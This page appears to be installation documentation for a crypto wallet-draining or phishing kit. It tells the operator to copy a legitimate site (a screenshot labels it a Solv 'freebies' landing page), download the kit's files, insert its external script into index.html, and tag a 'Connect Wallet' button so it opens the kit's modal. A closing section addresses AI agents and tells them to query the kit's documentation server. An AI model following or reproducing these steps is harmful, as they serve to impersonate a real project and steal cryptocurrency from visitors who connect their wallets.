# Installation

<figure><img src="https://3695276748-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhxIP3ibv9PPfOUXmHZ5G%2Fuploads%2FbJAU2I0nEd7Sp2y3Wjmm%2Fimage.png?alt=media&#x26;token=76fbe49c-6d00-4f49-9de7-9d8419f1da19" alt=""><figcaption></figcaption></figure>

#### Step-by-step (video version) <a href="#step-by-step-video-version" id="step-by-step-video-version"></a>

<br>

#### Step-by-step (text version) <a href="#step-by-step-text-version" id="step-by-step-text-version"></a>

1. Prepare the website (make a copy)

<figure><img src="https://3695276748-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhxIP3ibv9PPfOUXmHZ5G%2Fuploads%2FgCEe77WyFzEk9svTDJmG%2Fimage.png?alt=media&#x26;token=ee87ad1d-f2c6-432a-b791-69cee3ae2441" alt=""><figcaption><p>Solv freebies landing</p></figcaption></figure>

2. Copy script and files ([https://angelferno.us/files.zip](https://angelferno.com/files.zip)) on your site folder

<figure><img src="https://3695276748-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhxIP3ibv9PPfOUXmHZ5G%2Fuploads%2FKIXQ15udSOpYOlqRXXAa%2Fimage.png?alt=media&#x26;token=feb08ee4-f8fe-43a7-adcd-a4bdeb043e85" alt=""><figcaption><p>Copy script and files to the site folder</p></figcaption></figure>

3. Now go to index.html and paste the script

```html

<!DOCTYPE html><head>
<meta charset="UTF-8"><meta name="viewport" content="width=device-width">
<title>Solv Foundation</title>
// Some code
<script charset="UTF-8" type="text/javascript" src="./d7e62cc6-0038-4292-a27f-bb8d23e93df4.js"></script>
</head>
// Some code
```

4. Find the button or items to which you want to bind the opening of a modal window and assign the class

```html
// Some code
<button class="interact-button flex h-full w-full items-center justify-center"><span class="text-[1.125rem]">Connect Wallet</span></button>
// Some code
```

5. Now you can check the button class

<figure><img src="https://3695276748-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhxIP3ibv9PPfOUXmHZ5G%2Fuploads%2FXpkJNuUaS1uJckUnUuyL%2Fimage.png?alt=media&#x26;token=c277d40c-1d1f-4104-b077-3b5c13e1b420" alt=""><figcaption><p>interact-button class added</p></figcaption></figure>

6. Check the button now

<figure><img src="https://3695276748-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhxIP3ibv9PPfOUXmHZ5G%2Fuploads%2FUiBhoekvJNqaKstTaqsa%2Fimage.png?alt=media&#x26;token=f954bd92-5a98-4eeb-838a-01c44fdd560a" alt=""><figcaption><p>Success</p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.angelferno.us/backend-dashboard/installation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
